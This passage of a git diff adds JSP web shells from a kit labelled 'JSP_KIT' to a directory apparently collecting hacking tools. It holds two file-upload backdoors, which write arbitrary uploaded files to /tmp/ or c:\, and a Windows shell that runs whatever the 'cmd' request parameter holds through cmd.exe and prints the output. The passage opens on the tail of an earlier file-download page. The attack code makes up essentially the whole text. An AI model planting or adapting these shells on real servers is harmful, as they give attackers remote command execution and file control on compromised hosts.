+			} catch(IOException ex) {ex.printStackTrace();}
+		outs.flush();
+		outs.close();
+		in.close();	
+		} else {
+		out.print("Can't Read file
    ");
+		}
+	}
+} catch(Exception ex) {ex.printStackTrace();}
+%>
\ No newline at end of file
diff --git a/jsp/hackk8/jsp_77/up.jsp b/jsp/hackk8/jsp_77/up.jsp
new file mode 100644
index 0000000..5df5d0d
--- /dev/null
+++ b/jsp/hackk8/jsp_77/up.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "/tmp/";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+
diff --git a/jsp/hackk8/jsp_77/win32/cmd_win32.jsp b/jsp/hackk8/jsp_77/win32/cmd_win32.jsp
new file mode 100644
index 0000000..21f2bdc
--- /dev/null
+++ b/jsp/hackk8/jsp_77/win32/cmd_win32.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
    +<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "\n
    ");
+        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); disr = dis.readLine(); }
+        }
+%>
+
    
+
\ No newline at end of file
diff --git a/jsp/hackk8/jsp_77/win32/up_win32.jsp b/jsp/hackk8/jsp_77/win32/up_win32.jsp
new file mode 100644
index 0000000..ff977ac
--- /dev/null
+++ b/jsp/hackk8/jsp_77/win32/up_win32.jsp
@@ -0,0 +1,162 @@
+
+<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
+<%
+//
+// JSP_KIT
+//
+// up.jsp = File Upload (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+
+
    
+
+
+
    
+
+<%!
+public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
+	String boundary = null;
+	Enumeration enum = request.getHeaderNames();
+	while(enum.hasMoreElements()){
+		String header = (String)enum.nextElement();
+		String hvalue = request.getHeader(header);
+		prop.setProperty((header).toLowerCase(),hvalue);
+		if("content-type".equalsIgnoreCase(header) ){
+			int idx = hvalue.lastIndexOf("boundary=");
+			if(idx != -1 ){
+				boundary= hvalue.substring(idx+9 , hvalue.length());
+			}
+		}
+	}
+	return boundary;
+	
+}
+public String getFileName(String secondline){
+	int len = secondline.length();
+	int idx = secondline.lastIndexOf("filename=");
+	if(idx == -1 ) return null;
+	String filename = secondline.substring(idx+10 , len-1);
+	filename = filename.replace('\\','/');
+	idx = filename.lastIndexOf("/");
+	idx = idx + 1;
+	filename = filename.substring( idx );
+	return filename;        
+}
+%>
+<%
+String DPATH = "c:\\";
+int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
+int MAXSIZE = 10; // 10 Mega Byte
+String boundary = getBoundary(request,prop);
+if(boundary == null ){
+	boundary = prop.getProperty("boundary"); 
+	}else{
+	boundary = "--"+boundary;
+	}
+if(boundary == null ){
+	return;
+	}
+Long contentsize = new Long(prop.getProperty("content-length","0"));
+int c;
+StringWriter st = new StringWriter();
+if(contentsize.longValue() < 1L ){
+	return;
+	} 
+long l = contentsize.longValue() - ROUGHSIZE; 
+int KB = 1024;
+int MB = 1024 * KB;
+int csize = (int)(l / MB);
+if(csize > MAXSIZE ){
+	return;
+	}
+ServletInputStream fin =  request.getInputStream();
+int cn;
+int count=0;
+while((c=fin.read()) != -1 ){
+	if( c == '\r') break;
+	st.write(c);
+	count++;
+	}
+c=fin.read();
+String tboundary = st.getBuffer().toString();
+tboundary=tboundary.trim();
+if(! tboundary.equalsIgnoreCase( boundary) ){
+	return;
+	}
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write(c);
+	}
+c=fin.read();
+String secondline = st.getBuffer().toString();
+String filename  =  getFileName(secondline);
+st.close();
+st = null;
+st = new StringWriter();
+while((c=fin.read()) != -1 ){
+	if( c == '\r' ) break;
+	st.write( c );
+	}
+c=fin.read();
+
+fin.read(); 
+fin.read();  
+File newfile = null;
+FileOutputStream fout =null; 
+try{
+	if(filename == null) throw new FileNotFoundException("File Name not found");
+	newfile = new File(DPATH+filename); 
+	fout = new FileOutputStream( newfile );
+	}catch(FileNotFoundException fnexp){
+	fin.close();
+	return;
+	}
+
+byte b[] = null;
+while(l > 1024L){
+	b = new byte[1024];
+	fin.read(b,0,1024);
+	fout.write(b);
+	b=null;
+	l -= 1024L;
+	}
+if(l > 0){
+	b = new byte[(int)l];
+	fin.read(b,0,(int)l);
+	fout.write(b);
+	}
+
+
+ByteArrayOutputStream baos = new ByteArrayOutputStream();
+while((c = fin.read()) != -1){
+	baos.write(c);
+	}
+String laststring = baos.toString();
+int idx = laststring.indexOf(boundary);
+b = baos.toByteArray();
+if(idx > 2){
+	fout.write(b,0,idx-2);
+	}else{
+	fout.close();
+	newfile.delete();
+	return;
+	}
+fout.flush();
+fout.close();
+fin.close();
+
+out.println("FileName: " + newfile.getName());
+out.println("FileSize: " + newfile.length());
+
+%>
+
+
+
+        
+